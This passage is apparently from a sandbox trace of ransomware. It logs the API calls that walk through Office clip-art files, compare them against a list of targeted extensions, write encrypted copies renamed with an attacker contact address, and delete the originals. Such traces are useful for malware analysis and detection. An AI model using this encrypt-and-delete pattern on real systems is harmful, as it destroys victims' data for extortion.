Office\\CLIPART\\PUB60COR\\AG00120_.GIF") returned 63 [0053.233] lstrlenW (lpString=".doc") returned 4 [0053.233] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0053.233] lstrlenW (lpString=".docx") returned 5 [0053.233] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0053.233] lstrlenW (lpString=".pdf") returned 4 [0053.233] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0053.233] lstrlenW (lpString=".xls") returned 4 [0053.233] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0053.233] lstrlenW (lpString=".xlsx") returned 5 [0053.233] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0053.233] lstrlenW (lpString=".ppt") returned 4 [0053.233] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0053.233] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00120_.GIF") returned 63 [0053.233] lstrlenW (lpString=".zip") returned 4 [0053.233] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0053.233] lstrlenW (lpString=".rar") returned 4 [0053.233] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0053.233] lstrlenW (lpString=".bz2") returned 4 [0053.233] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0053.233] lstrlenW (lpString=".7z") returned 3 [0053.233] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0053.233] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00120_.GIF") returned 63 [0053.233] lstrlenW (lpString=".dbf") returned 4 [0053.234] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0053.234] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00120_.GIF") returned 63 [0053.234] lstrlenW (lpString=".1cd") returned 4 [0053.234] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0053.234] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00120_.GIF") returned 63 [0053.234] lstrlenW (lpString=".jpg") returned 4 [0053.234] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0053.234] GetFileSizeEx (in: hFile=0x1b4, lpFileSize=0x2aaff1c | out: lpFileSize=0x2aaff1c*=3140) returned 1 [0053.234] CloseHandle (hObject=0x1b4) returned 1 [0053.234] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00126_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00126_.gif")) returned 0x20 [0053.234] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00126_.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00126_.gif.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0053.234] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00126_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00126_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4 [0053.234] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0053.234] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0053.234] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00126_.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00126_.gif.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0 [0053.235] GetLastError () returned 0x0 [0053.235] ReadFile (in: hFile=0x1b4, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0xc44, lpOverlapped=0x0) returned 1 [0053.236] WriteFile (in: hFile=0x1a0, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xc50, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0xc50, lpOverlapped=0x0) returned 1 [0053.237] ReadFile (in: hFile=0x1b4, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x0, lpOverlapped=0x0) returned 1 [0053.237] WriteFile (in: hFile=0x1a0, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0xec, lpOverlapped=0x0) returned 1 [0053.237] SetEndOfFile (hFile=0x1a0) returned 1 [0053.237] CloseHandle (hObject=0x1a0) returned 1 [0053.237] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0053.237] SetEndOfFile (hFile=0x1b4) returned 1 [0053.238] CloseHandle (hObject=0x1b4) returned 1 [0053.238] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00126_.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0053.238] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00126_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00126_.gif")) returned 1 [0053.239] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00126_.GIF") returned 63 [0053.239] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00126_.GIF") returned 63 [0053.239] lstrlenW (lpString=".doc") returned 4 [0053.239] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0053.239] lstrlenW (lpString=".docx") returned 5 [0053.239] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0053.239] lstrlenW (lpString=".pdf") returned 4 [0053.239] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0053.239] lstrlenW (lpString=".xls") returned 4 [0053.239] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0053.239] lstrlenW (lpString=".xlsx") returned 5 [0053.239] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0053.239] lstrlenW (lpString=".ppt") returned 4 [0053.239] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0053.239] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00126_.GIF") returned 63 [0053.239] lstrlenW (lpString=".zip") returned 4 [0053.239] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0053.239] lstrlenW (lpString=".rar") returned 4 [0053.239] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0053.239] lstrlenW (lpString=".bz2") returned 4 [0053.239] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0053.239] lstrlenW (lpString=".7z") returned 3 [0053.239] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0053.239] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00126_.GIF") returned 63 [0053.239] lstrlenW (lpString=".dbf") returned 4 [0053.239] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0053.239] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00126_.GIF") returned 63 [0053.239] lstrlenW (lpString=".1cd") returned 4 [0053.239] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0053.240] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00126_.GIF") returned 63 [0053.240] lstrlenW (lpString=".jpg") returned 4 [0053.240] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0053.240] GetFileSizeEx (in: hFile=0x1b4, lpFileSize=0x2aaff1c | out: lpFileSize=0x2aaff1c*=12482) returned 1 [0053.240] CloseHandle (hObject=0x1b4) returned 1 [0053.240] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00129_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00129_.gif")) returned 0x20 [0053.240] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00129_.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00129_.gif.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0053.240] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00129_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00129_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4 [0053.240] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0053.240] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0053.240] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00129_.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00129_.gif.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0 [0053.241] GetLastError () returned 0x0 [0053.241] ReadFile (in: hFile=0x1b4, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x30c2, lpOverlapped=0x0) returned 1 [0053.318] WriteFile (in: hFile=0x1a0, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x30d0, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0x30d0, lpOverlapped=0x0) returned 1 [0053.319] ReadFile (in: hFile=0x1b4, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x0, lpOverlapped=0x0) returned 1 [0053.319] WriteFile (in: hFile=0x1a0, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0xec, lpOverlapped=0x0) returned 1 [0053.319] SetEndOfFile (hFile=0x1a0) returned 1 [0053.319] CloseHandle (hObject=0x1a0) returned 1 [0053.319] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0053.319] SetEndOfFile (hFile=0x1b4) returned 1 [0053.320] CloseHandle (hObject=0x1b4) returned 1 [0053.320] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00129_.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0053.320] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00129_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00129_.gif")) returned 1 [0053.321] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00129_.GIF") returned 63 [0053.321] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00129_.GIF") returned 63 [0053.321] lstrlenW (lpString=".doc") returned 4 [0053.321] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0053.321] lstrlenW (lpString=".docx") returned 5 [0053.321] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0053.321] lstrlenW (lpString=".pdf") returned 4 [0053.321] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0053.321] lstrlenW (lpString=".xls") returned 4 [0053.321] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0053.321] lstrlenW (lpString=".xlsx") returned 5 [0053.321] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0053.321] lstrlenW (lpString=".ppt") returned 4 [0053.321] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0053.321] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00129_.GIF") returned 63 [0053.321] lstrlenW (lpString=".zip") returned 4 [0053.321] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0053.321] lstrlenW (lpString=".rar") returned 4 [0053.321] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0053.321] lstrlenW (lpString=".bz2") returned 4 [0053.321] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0053.321] lstrlenW (lpString=".7z") returned 3 [0053.321] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0053.321] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00129_.GIF") returned 63 [0053.321] lstrlenW (lpString=".dbf") returned 4 [0053.321] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0053.321] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00129_.GIF") returned 63 [0053.321] lstrlenW (lpString=".1cd") returned 4 [0053.322] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0053.322] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00129_.GIF") returned 63 [0053.322] lstrlenW (lpString=".jpg") returned 4 [0053.322] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0053.322] GetFileSizeEx (in: hFile=0x1b4, lpFileSize=0x2aaff1c | out: lpFileSize=0x2aaff1c*=5030) returned 1 [0053.322] CloseHandle (hObject=0x1b4) returned 1 [0053.322] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00158_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00158_.gif")) returned 0x20 [0053.322] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00158_.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00158_.gif.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0053.322] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00158_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00158_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4 [0053.322] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0053.322] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0053.322] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00158_.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00158_.gif.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0 [0053.323] GetLastError () returned 0x0 [0053.323] ReadFile (in: hFile=0x1b4, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x13a6, lpOverlapped=0x0) returned 1 [0053.373] WriteFile (in: hFile=0x1a0, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x13b0, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0x13b0, lpOverlapped=0x0) returned 1 [0053.374] ReadFile (in: hFile=0x1b4, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x0, lpOverlapped=0x0) returned 1 [0053.374] WriteFile (in: hFile=0x1a0, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0xec, lpOverlapped=0x0) returned 1 [0053.374] SetEndOfFile (hFile=0x1a0) returned 1 [0053.374] CloseHandle (hObject=0x1a0) returned 1 [0053.375] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0053.375] SetEndOfFile (hFile=0x1b4) returned 1 [0053.375] CloseHandle (hObject=0x1b4) returned 1 [0053.375] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00158_.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0053.376] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00158_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00158_.gif")) returned 1 [0053.376] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00158_.GIF") returned 63 [0053.376] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00158_.GIF") returned 63 [0053.376] lstrlenW (lpString=".doc") returned 4 [0053.376] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0053.376] lstrlenW (lpString=".docx") returned 5 [0053.376] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0053.376] lstrlenW (lpString=".pdf") returned 4 [0053.376] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0053.376] lstrlenW (lpString=".xls") returned 4 [0053.376] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0053.376] lstrlenW (lpString=".xlsx") returned 5 [0053.376] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0053.376] lstrlenW (lpString=".ppt") returned 4 [0053.376] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0053.376] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00158_.GIF") returned 63 [0053.376] lstrlenW (lpString=".zip") returned 4 [0053.376] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0053.376] lstrlenW (lpString=".rar") returned 4 [0053.376] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0053.376] lstrlenW (lpString=".bz2") returned 4 [0053.376] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0053.376] lstrlenW (lpString=".7z") returned 3 [0053.376] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0053.376] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00158_.GIF") returned 63 [0053.376] lstrlenW (lpString=".dbf") returned 4 [0053.377] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0053.377] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00158_.GIF") returned 63 [0053.377] lstrlenW (lpString=".1cd") returned 4 [0053.377] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0053.377] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00158_.GIF") returned 63 [0053.377] lstrlenW (lpString=".jpg") returned 4 [0053.377] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0053.377] GetFileSizeEx (in: hFile=0x1b4, lpFileSize=0x2aaff1c | out: lpFileSize=0x2aaff1c*=7583) returned 1 [0053.377] CloseHandle (hObject=0x1b4) returned 1 [0053.377] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00161_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00161_.gif")) returned 0x20 [0053.377] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00161_.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00161_.gif.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0053.377] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00161_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00161_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4 [0053.377] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0053.377] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0053.377] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00161_.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00161_.gif.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0 [0053.378] GetLastError () returned 0x0 [0053.378] ReadFile (in: hFile=0x1b4, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x1d9f, lpOverlapped=0x0) returned 1 [0053.386] WriteFile (in: hFile=0x1a0, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x1da0, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0x1da0, lpOverlapped=0x0) returned 1 [0053.387] ReadFile (in: hFile=0x1b4, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x0, lpOverlapped=0x0) returned 1 [0053.387] WriteFile (in: hFile=0x1a0, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0xec, lpOverlapped=0x0) returned 1 [0053.387] SetEndOfFile (hFile=0x1a0) returned 1 [0053.389] CloseHandle (hObject=0x1a0) returned 1 [0053.395] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0053.396] SetEndOfFile (hFile=0x1b4) returned 1 [0053.414] CloseHandle (hObject=0x1b4) returned 1 [0053.414] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00161_.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0053.414] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00161_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00161_.gif")) returned 1 [0053.414] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00161_.GIF") returned 63 [0053.414] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00161_.GIF") returned 63 [0053.414] lstrlenW (lpString=".doc") returned 4 [0053.414] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0053.414] lstrlenW (lpString=".docx") returned 5 [0053.414] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0053.414] lstrlenW (lpString=".pdf") returned 4 [0053.414] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0053.414] lstrlenW (lpString=".xls") returned 4 [0053.415] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0053.415] lstrlenW (lpString=".xlsx") returned 5 [0053.415] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0053.415] lstrlenW (lpString=".ppt") returned 4 [0053.415] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0053.415] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00161_.GIF") returned 63 [0053.415] lstrlenW (lpString=".zip") returned 4 [0053.415] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0053.415] lstrlenW (lpString=".rar") returned 4 [0053.415] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0053.415] lstrlenW (lpString=".bz2") returned 4 [0053.415] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0053.415] lstrlenW (lpString=".7z") returned 3 [0053.415] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0053.415] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00161_.GIF") returned 63 [0053.415] lstrlenW (lpString=".dbf") returned 4 [0053.415] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0053.415] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00161_.GIF") returned 63 [0053.415] lstrlenW (lpString=".1cd") returned 4 [0053.415] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0053.415] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00161_.GIF") returned 63 [0053.415] lstrlenW (lpString=".jpg") returned 4 [0053.415] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0053.415] GetFileSizeEx (in: hFile=0x1b4, lpFileSize=0x2aaff1c | out: lpFileSize=0x2aaff1c*=5375) returned 1 [0053.415] CloseHandle (hObject=0x1b4) returned 1 [0053.416] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00169_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00169_.gif")) returned 0x20 [0053.416] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00169_.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00169_.gif.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0053.416] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00169_.GIF" (normalized: "c:\\program 